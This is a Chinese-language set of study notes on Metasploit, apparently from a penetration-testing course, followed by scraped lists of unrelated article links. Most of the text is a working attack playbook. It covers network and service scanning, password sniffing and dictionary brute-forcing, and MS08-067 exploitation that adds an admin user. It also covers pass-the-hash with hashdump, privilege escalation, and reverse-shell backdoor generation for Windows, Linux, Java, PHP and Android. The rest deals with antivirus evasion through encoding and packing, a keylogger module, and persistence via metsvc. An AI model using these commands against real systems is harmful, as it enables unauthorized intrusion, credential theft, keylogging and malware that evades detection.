-----------------第一季--------------------

启动Metasploit:msfconsole

升级和更新:./msfupdate

直接退出:exit 退回上一级:quit

1.端口扫描:

a.调用Nmap扫描

nmap -v -sV ip

b.调用msf模块扫描(1)

 use auxiliary/scanner/portscan/syn

 show options

 set INTERFACE 网卡

 set PORTS 端口

 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)

 set THREADS 100

 run

2.SMB扫描_获取系统信息

 msfconsole

 use auxiliary/scanner/smb/smb_version

 show options

 set RHOST IP

(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)

 set THREADS 10

 run

3.服务识别(ssh)

 msfconsole

 use auxiliary/scanner/ssh/ssh_version

 show options

 set RHOST IP

 run

服务识别(FTP)

 use auxiliary/scanner/ftp/ftp_version

 show options

 set FTPUSER

 set RHOST IP

 run

4.密码嗅探

 msfconsole

 use auxiliary/sniffer/psnuffle

 show options

 run

5.SNMP扫描与枚举

 msfconsole

 search snmp

 use auxiliary/scanner/snmp/snmp_login

 show options

 set RHOST IP

 set THREADS 10

 run

 use auxiliary/scanner/snmp/snmp_enum

 set RHOST IP

 set THREADS 10

 run

6.SMB登陆验证

 msfconsole

 use auxiliary/scanner/smb/smb_login

 show options

 set RHOST IP

 set SMBUser administrator

 set THREADS 100

 run

7.VNC身份验证

 msfconsole

 use auxiliary/scanner/vnc/vnc_none_auth

 show options

 set RHOST IP

 set THREADS 100

 run

8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)

 msfconsole

 load wmap

 wmap_sites

 wmap_sites -a url

 wmap_sites -l

 wmap_targets -h

 wmap_targets -t url

 wmap_targets -l

 wmap_run -h

 wmap_run -t 

---------------第二季--------------
1.远程代码执行

 msfconsole

 search 08-067

 use exploit/windows/smb/ms08_067_netapi

 show options

 set RHOST IP

 show payloads

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST ip

 info(查看影响版本)

 用nmap查看目标服务器版本

 set target 编号

 show options(检查是否已经设置好)

 exploit

 shell

 net user admin admin /add

2.MJDJ文件解析远程代码执行

 msfconsole 

 search12-004

 use exploit/windows/browser/ms12_004_midi

 show options

 set SRVHOST IP

 exploit

 set URIPATH /

 show options

 set LPORT 1244

 show options

 exploit

 sessions

 sessions -i id

 

3.口令安全

 msfconsole

 serach msql_login(ssh_login,ftp_login)

 use auxiliary/scanner/mysql/mysql_login

 set RHOST IP

 set USERNAME root

 set PASS_FILE 字典路径

 set THREAD 50

 set options(check)

 exploit

4.hash值传递渗透

(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)

 msfconsole

 use/windows/smb/psexec

 show options

 set RHOST IP

 set SMMBUSER 帐号

 show options

 exploit

 hashdump(获取hash值)

 exit

 set smbpass hash

 exploit

5.NDP内核提权

前提:必须有一个session

 serarch 14-002

 use  exploit/windows/local/ms_ndproxy

 show options

 set session 1(id)

 show options

 exploit

提权:getsystem

6.多种后门的生成
a.windows后门的生成

 msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe

 search handler

 use exploit/mulit/handler

 show options

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 set LPORT 端口

 点击123.exe

b.linux后门的生成

 msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux

 chmod 777 linux

 ls

 ./linux

c.java后门的生成

 msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar

 

d.php后门的生成

 msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php

上传到目标站-本地监听-目标访问服务器

e.安桌后门的生成

 msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk

 目标运行1.apk

 本地监听

 

7.内网渗透

获得shell扫描c段

 run get_local_subnets 获取网卡

 run autoroute -s ip 扫描c段

劫持域管理

 use incognito

 impersonate_token 域

 shell

-----------------------

 use auxiliary/sniffer/psnuffle

 run

 

8.反反病毒(免杀)

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe

------------------------------------------------------------------------------

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe

-------------------------------------------------------------------------------

msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10

-----------------------------------------------------------------

upx -5 /1231.exe 加壳

 

9.不一样的xss(键盘记录)

 msfconsole

 search keylogger

 use auxiliary/server/capture/http_javascript_keyloger

 show options

 set DEMO true

 set URIPATH /

 set srvport 80

 run

10.维持访问

 msfconsole

 use exploit/multi/handler

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 SET LPORT 1111

 run

 run metsvs -A

-------------------------------------------

 use exploit/multi/handler

 set payload windows/meterpreter/metsvs_bind_tcp

 show options

 set LPORT 31337

 set RHOST IP

 exploit

 keyscan_start(键盘记录)

 keyscan_dump

羽翼metasploit第一,二季学习笔记的更多相关文章

  1. 《Linux内核设计与实现》 第一二章学习笔记

    <Linux内核设计与实现> 第一二章学习笔记 第一章 Linux内核简介 1.1 Unix的历史 Unix的特点 Unix很简洁,所提供的系统调用都有很明确的设计目的. Unix中一切皆 ...

  2. 《java编程思想(第四版)》第一二章学习笔记

    目录 一.Introduction 1.抽象过程 2.面向对象语言(包括Java)的五个基本特性 3.每个对象都提供服务 4.public.private.protected三者的区别 5.Java的 ...

  3. 《Linux内核设计与实现》第一、二章学习笔记

    <Linux内核设计与实现>第一.二章学习笔记 姓名:王玮怡  学号:20135116 第一章 Linux内核简介 一.关于Unix ——一个支持抢占式多任务.多线程.虚拟内存.换页.动态 ...

  4. 毕业设计 之 二 PHP学习笔记(一)

    毕业设计 之 二 PHP学习笔记(一) 作者:20135216 平台:windows10 软件:XAMPP,DreamWeaver 一.环境搭建 1.XAMPP下载安装 XAMPP是PHP.MySQL ...

  5. 学习笔记(三)--->《Java 8编程官方参考教程(第9版).pdf》:第十章到十二章学习笔记

    回到顶部 注:本文声明事项. 本博文整理者:刘军 本博文出自于: <Java8 编程官方参考教程>一书 声明:1:转载请标注出处.本文不得作为商业活动.若有违本之,则本人不负法律责任.违法 ...

  6. VBA二次学习笔记(1)——文件操作

    说明(2018-9-1 11:20:46): 1. 上班三个月了,累的一逼,真的是钱少事多离家远,每天早上六点起,晚上八点回.哎,少壮不努力啊! 2. 三个月没写博客了,上一篇已经是5.29的了,真的 ...

  7. 《Linux命令行与shell脚本编程大全》 第一、二章 学习笔记

    第一章:初识Linux shell Linux内核负责以下4个主要功能: 1.系统内存管理 2.软件程序管理 3.硬件设备管理 4.文件系统管理 1.系统内存管理 内核不仅管理服务器上的可用物理内存, ...

  8. 《Linux内核设计与实现》 第一、二章学习笔记

    第一章 Linux内核简介 一.Unix 1.Unix的特点 简洁 绝大部分东西都被当做文件对待.这种抽象使对数据和对设备的操作都是通过一套相同的系统调用借口来进行的:open(),read(),wr ...

  9. 《Linux内核设计与实现》第一二章读书笔记

    第一章 Linux内核简介 1.Unix简介 (一)概念:支持抢占式多任务.多进程.虚拟内存.换页.动态链接和TCP/IP网络的现代化操作系统. (二)Unix特点(层次化结构): Unix很简洁,仅 ...

随机推荐

  1. iDigital2019数字营销广告主峰会

    iDigital 数字营销品牌广告主峰会是定向邀请形式的闭门社交峰会, 现已成长为享誉亚洲的营销广告行业活动, 致力于帮助品牌营销官, 决策者和业界同行在日益整合的数字商业时代下获得战略远景.组委会邀 ...

  2. 屏幕适配(UGUI)非UI

    using UnityEngine; public enum Suit_UIType { Background, Effect, } [RequireComponent(typeof(Transfor ...

  3. CurrentHashMap、HashMap、HashTable的区别

    HashTable 底层数组+链表实现,无论key还是value都不能为null,线程安全,实现线程安全的方式是在修改数据时锁住整个HashTable,效率低,ConcurrentHashMap做了相 ...

  4. sql server 操作列

    新增一列 ) 修改列类型: ) 修改列的名称: EXEC sp_rename 'tableName.column1' , 'column2' (把表名为tableName的column1列名修改为co ...

  5. java 知识点

    1. java泛型 避免编译错误 (ArrayList定义时候)    避免强制类型装换 2 多态的体现 实现多态主要有以下三种方式:1. 接口实现 2. 继承父类重写方法 3. 同一类中进行方法重载 ...

  6. 每天一个Linux命令 10

    文件处理命令:ln命令名称:ln 命令英文原意:link语法: ln -s [原文件] [目标文件] -s 创建软连接功能描述:生成链接文件 #ln -s /etc/issue /tmp/issue. ...

  7. SSM项目思路整合NEW

    #首先进行项目思路整体分析,具体包括哪些模块,如何实现等: 一)搭建环境 1.导包: (Spring核心包4个 + 面向切面的包4个 + SpringJDBC和事务的包各一个, SpringMVC两个 ...

  8. Flutter路由跳转及参数传递

    本文要介绍的知识点 用路由推出一个新页面 打开新页面时,传入参数 参数的回传 路由 做Android/iOS原生开发的时候,要打开一个新的页面,你得知道你的目标页面对象,然后初始化一个Intent或者 ...

  9. MySQL5.7 Dockerfile

    #Dockerfile for mysql5.7 FROM centos COPY ["src","/src"] RUN groupadd -g 1003 my ...

  10. 【 剑指Offer 1 】数据结构

    数据结构是技术面试中的重点,总结以下几种常见的必须熟练掌握数据结构. 数组 字符串 链表 树 栈和队列 数组和字符串是两种最基本的数据结构,连续内存: 链表和树是面试中出现频率最高的: 栈与递归密切相 ...